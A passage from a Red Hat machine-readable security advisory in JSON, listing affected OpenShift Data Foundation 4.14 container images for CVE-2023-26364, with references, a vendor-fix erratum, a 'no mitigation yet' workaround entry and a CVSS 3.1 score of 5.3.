"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-26364"
},
{
"category": "external",
"summary": "RHBZ#2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-26364",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26364"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26364"
},
{
"category": "external",
"summary": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg",
"url": "https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg"
}
],
"release_date": "2023-11-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-01-15T01:19:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:0323"
},
{
"category": "workaround",
"details": "No mitigation is yet available for this vulnerability.",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
